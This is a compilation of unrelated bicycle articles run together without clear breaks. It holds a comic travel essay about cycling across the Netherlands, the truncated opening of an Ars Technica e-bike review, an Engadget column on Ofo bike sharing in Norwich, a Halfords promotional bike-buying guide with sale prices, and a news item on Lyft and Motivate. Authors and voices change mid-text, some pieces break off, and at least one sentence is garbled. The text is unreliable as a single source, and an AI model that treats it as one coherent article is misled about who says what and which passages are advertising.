Kati Auld
October 2, 2018
Hoodwinked into cycling across the Netherlands, indifferent cyclist Kati Auld quickly realized how a bicycle changes the experience of travel.
Here are some facts about bicycles: It is fun to go fast, on wheels; it is terrible to push a bike up a hill; falling off a bike tends to hurt a lot. If you had asked me six months ago, that is probably the most complicated assessment of cycling I could have given you. My physical ability is made up of equal parts enthusiasm and clumsiness; I tend to fall off things.
I feel the same way about bikes as you might about, say, a kitchen mandoline: Useful for some specific tasks—but at the risk of slicing the tips of your fingers off. I can feel a grudging admiration for the lycra-sheathed bodies that pass at ridiculous speeds (either much too fast down hills, or much too slowly up them), but in general I don’t really understand what’s driving them, other than a vague lack of self-respect.
So why, exactly, am I fixing a slipped chain in a forest, alone, in the Netherlands?
Naturally, I was hoodwinked by a cyclist.
Here is another fact about bicycles: They are the solution to all the world’s problems. Did you know this? I knew it, in the technical sense, the same way I know we should all probably be vegan. Bicycles, according to a fairly vocal group of nutters, are much better for your health (obviously), are a much more efficient use of space in cities (of course) and are powered by porridge, or sandwiches, or whatever their rider had for breakfast. Magnificent! So here I am, experiencing the long-term glories of carbon-neutral travel for the first time. I’ve never missed my car more.

Cathleen, my brilliant, principled friend, does not share my problems with ethical ambivalence. The Venn diagram of our interests is two neat circles, bobbing alongside each other. In mine are skincare, whiskey, music festivals and diving; in hers are human evolution, urban planning, West African jazz, spreadsheets. Despite being wildly different people, we’ve been friends for 10 years, through breakups and deaths, ideological differences and international moves. Our friendship is the one leg of this wobbly table called life that I have utter faith in.
So, when she suggests that we can do a camping trip in the Netherlands, and points out how much more ground we’ll be able to cover on bicycles, I do have to agree that it makes a certain kind of sense. That was my first mistake.
My second mistake was forgetting that Cathleen is one of those people who looks human but is, in fact, a high-speed train in disguise. She continues to refer to our trip as a ‘jaunt’, pointing out all of the time we will have to visit farmer’s markets and climb up whimsical towers and bask in the sun. But it is 6pm and we’re still cycling, along a river, a wide road with open water alongside us, and a headwind. The water is glinting golden; the verge is overgrown with wild flowers. Every muscle in my body is politely requesting death.

By the time we’ve reached our first campsite, I have taken two magnificent falls, one of which was down an escalator, my bicycle and I wrapped around each other in a grim, death-defying dance. We have cycled more than 50 kilometers. I can’t feel my legs; Cathleen calls the exercise “breezy.”
I delicately place my poor bruised bum bones on the saddle the next day. “Bike is home,” I pronounce. Bike is home.
By day four, there’s a section where a loose bit of gravel runs forever downhill, and I speed on ahead, screeching around the corners, with the familiar closeness of injury—my old friend—never too far away.
The feeling of being your own engine, well, it’s addictive. Somehow, movement has become our neutral state. Now, when we stop to fix something, instead of it being a joy and a relief, it’s an irritation. Maybe bike is home.
We start to hit rhythms. We talk about politics, the world’s best kind of dumpling, our careers, why Cathleen’s bike is named Spud. It’s not that the pain ever stops, exactly—by now I’ve tried so many minor variations in sitting angles that my entire saddle area is evenly painful, like a tanned side of beef—but it becomes irrelevant, a side show to the main event.
We breeze along country roads at sunset, with an industrial sprinkler shooting rainbow droplets into the air. (We hoped this was water; might just have easily been pesticides.) Every day is a mishmash of different scenes—endless farmland, duck-spotted canals, sandy paths alongside beech trees—and every time we roll past another beautiful sight, we both hold our breath, hoping that the other won’t ask to stop and take a photo. Everything becomes a montage, because the surroundings are never as important as the impetus to keep going. In some small way, it feels as obvious as the urge to travel itself: Just. Keep. Moving.
By the time we arrive in Groningen, 400 kilometers later, I realize that something has fundamentally changed. Perhaps my bike will never have a name, and texting while cycling will remain an unreachable dream for me. Cycling will never be an end in itself. Because when it comes to travel, it’s a pretty good means. Bike is home.

As the managing editor of Ars Technica, one of my duties is to monitor the daily torrent of news tips and PR emails. The overwhelming majority of them is deleted after a glance, and the news tips and story ideas are passed along to the appropriate writer. Sometimes a product announcement will catch my eye, and I will follow up. Once in a blue moon, I’ll say, “please send me one so that I may review it.” And that’s how I ended up riding an electric bike around the Chicago suburbs for two weeks.
I’m one of the hardcore cyclists at Ars, along with Jay Timmer and his new-as-of-last-fall road bike as well as copyeditor Kerry Staurseth. I love cycling, and it was a major factor in my dropping 120lb over a 12-month period starting in the summer of 2009. My daily rider/errand-runner is a 1998 Gary Fisher Marlin mountain bike. For longer rides, I use my 2009 Trek XO2 cyclecross bike. I’ve made a few modifications to it, including removing the bumpy cyclecross tires and swapping out the front 46-tooth chainring for a 50-tooth one. I went with a cross bike over a road bike because I’m still a Clydesdale, and I like the slightly longer wheelbase of a cross bike. I’ve also briefly owned a 2011 Trek Madone 5.9, which I sold not long after I bought it due to severely screwing up my right knee.
But electric bicycles—e-bikes—are new territory for me. Broadly speaking, there are two basic options in e-bike land: power-on-demand and pedal-assist. With the former, the rider can control the speed with a throttle instead of just pedaling. Think moped but with an electric motor instead of internal combustion. Pedal-assist, by contrast, requires the rider to do some of the work. The electric motor won’t engage unless the rider is pedaling.

Bike rental services are spreading, going beyond early adopter epicenters like New York, London and Tokyo. And it’s dockless systems that seem to be gaining both more traction and umbrage. Daniel Cooper explains why Ofo’s bikesharing platform has totally replaced his own bike.
Daniel Cooper
Senior Editor
Norwich is a vibrant, bohemian city with a big cluster of tech and biotech startups all working to build something new. It is, however, underserved by some of the bigger fads in the technology world, like Uber.
It was a surprise, then, when Ofo, the Chinese dockless bike sharing service, came to the Fine City.
Dockless bike sharing involves seeding smart bikes across a city for people to use as and when required. If you need one, just walk up to it, scan the QR code below the back seat with your phone and it’ll unlock itself. When you’re done, park it somewhere safe and pull down the lock to end your trip. Each journey is billed at a flat rate of 50 pence (about 70 cents) per 30 minutes, making it ideal for short jaunts across the city.
The low cost is a big perk for me, because while I do own my own bike, it has sat rusting in my shed for several years now. I don’t have the time, expertise or will to maintain my own cycle for the few times I use it each month. I’m more than happy to let Ofo handle that for me, and to pay a little bit extra for the privilege in the longer term. (Even if I used it every day, it’d still take me the better part of a year before buying a new bike became cost-effective.)
There’s also the fact that Norwich itself welcomes bikes, and is making a push to get more cars off its roads in the city centre. That means that once you’re beyond the slightly intense main road that runs past my house, it’s a gentle and comfortable way to get around. The city isn’t too car friendly, and cycling is apparently more of a walkout than the comparable walk.
But more than that, it’s the convenience of being able to leap onto a cycle as and when you need that makes the most sense. A couple of weeks ago I was racing to an emergency dentist’s appointment, because I’m ashamed to admit that I conform to the stereotype about Brits having bad teeth. I thought I was going to be late, until I rounded a corner and found an Ofo parked on the sidewalk in front of me.
If I have any criticism of Ofo, it’s that the bikes themselves aren’t the most comfortable to ride on, although if they were they’d probably be stolen more frequently. Instead, they’re fat-tired commuter bikes with rickety mudguards that rattle if you go too fast or over rough terrain. You’ve also gotta pedal them pretty hard to go up and down hills, since they only have three gears (of which the first two are basically indistinguishable). Norwich has plenty of hills.

Oh, and the other issue is that the relatively small allocation of Ofo bikes in Norwich means that there’s a big imbalance in distribution. On the west side of the city, close to the two universities, you’re likely to find an available ride in less than fifty yards. On the east side, where I am, I’ve sometimes struggled to find a bike, or people have taken them in their homes so they don’t have to share. I once had to dig a bike out of a bush that someone had tried to hide one in, and Ofo could do worse than cracking down on these poor actors.
High-minded technology types on Twitter often like to get quite rude about dockless bike sharing services, calling them a wasteful fad. Often, sharing images of junked bikes from Ofo, Mobike and others piled miles high at public waste dumps. But it doesn’t necessarily have to be that way, especially in cities that need to expand their cycling infrastructure quickly. It might be that Norwich residents are grateful to have these bikes around, and that’s why they’re appropriately used most of the time.
“IRL” is a recurring column in which the Engadget staff run down what they’re buying, using, playing and streaming.

Bike Week runs from June 9-17
Bike Week is nearly here: the national event runs from June 9 – 17 in the UK, and is a great reminder of how good it can feel to be on two wheels.
For some people the process of selecting and buying a bike can be overwhelming.
It doesn’t have to be though and Halfords’ in-store experts will always talk you through a purchase to make sure you get the right bike for you.
Here’s a guide to the range of bikes available and why they might be the best choice for you and your little ones…
Balance bikes
These little two-wheelers are great for getting under-fives up to speed. They use their feet to move themselves along but it helps them learn to balance – this can mean they move to a bigger bike without stabilisers more quickly.
Recommended accessories: Halfords’ Blue Flames Helmet, Blue Horn and Blue Pad Set.

BMXs
For anyone who wants a stunt bike, the BMX is where it’s at. These bikes certainly aren’t designed for speed. Stunt pegs on the rear or front axle will help your kids do things that you’ll only be able to watch with one eye closed, but will exhilarate them. Just make sure they wear a helmet, and perhaps knee and elbow padding.
Halfords’ pick: The X-Rated Spine BMX has great U-brakes for stopping power, a great gear ratio (to help you build up speed quickly for tricks) and alloy wheels. Right now it’s down to £116 – a saving of £29.

For adults the Carrera Vengeance offers modern features like front suspension and disc brakes. Right now there’s a saving of 20 per cent off a range of kids’ bikes at Halfords while the Vengeance is down to £264 – a saving of £66.
Recommended accessories: Kids will love the Crackle Skate Kids Bike Helmet, Halfords Front & Rear Bike Mudguard Set and X Rated Kids Knee & Elbow Pads.

Classic bikes
These are largely about a particular look and a step-through frame which makes these bikes easy to get on. Vibrant colours usually involve pastel tones and shade to reflect your personality. You’ll also get a chain guard – ideal for keeping oil away from your clothes – and seven gears, making these great leisure bikes.

Road bike
The definition of a road bike is a little tricky these days, as there are several similar categories. However a road bike usually has drop handlebars for speed. They’re ideal for on-road use, as long as the roads are well-maintained. They’re lightweight and built for speed. If you’re new to these bikes then keep an eye out for potholes, they can buckle your wheel in extreme cases. These bikes are, however, the most efficient way to travel on good surfaces.

Hybrid bikes
These are like road bikes in that they are light and fast but they also have a slightly more rugged design that should allow them to be taken places that a road bike wouldn’t go. They’re not mountain bikes, but if you sometimes hit the parks and woods near your house this is what you want to pick.

Folding bikes
Useful if you commute with another type of vehicle but need to cycle as well. You can take folding bikes on trains, put them in the boot of a car or just carry them if needed. They generally fold to a compact size, useful for inner-city living where storage is a premium so they’re a great commuter tool.
Halfords’ pick: Down to £200 (save £50), the Raleigh Evo-2 Folding Bike is the perfect commuter tool. With seven gears and puncture-protection tyres it will be your daily companion for years to come.

E-bikes
A new category in relative terms and one that offers a power-boost to your own pedal power. What they do offer though is a way to help you up hills or give you extra oomph when you need it most.

Lyft might not sit idle while Uber leaps into the bike sharing space. The Information sources have claimed that Lyft is close to acquiring Motivate, the bike sharing behemoth responsible for New York City’s Citi Bikes and San Francisco’s Ford GoBikes. Neither company has agreed to comment on the move or how it would affect service, but it supposedly wouldn’t affect Motivate’s existing agreements.
If a buyout moved forward, it’d represent a coup for Lyft. Jump was only available in San Francisco when Uber stepped in this April, but Motivate has exclusive deals in NYC, San Francisco and Boston as well as a preferential arrangements in Chicago and Washington, DC. That could help Lyft quickly integrate bikes into its transportation network — as in Baltimore, you could start and stop journeys at bike docks to both save money and the environment. Uber isn’t necessarily shut out, but it’d have to develop its own services in areas where Lyft would have a head start.
However this might shake out, it would reflect an increasing shift away from purely car-based services among ridesharing companies. They’re diversifying in hopes of both cornering additional markets and protecting themselves in the event cars fall out of favor.
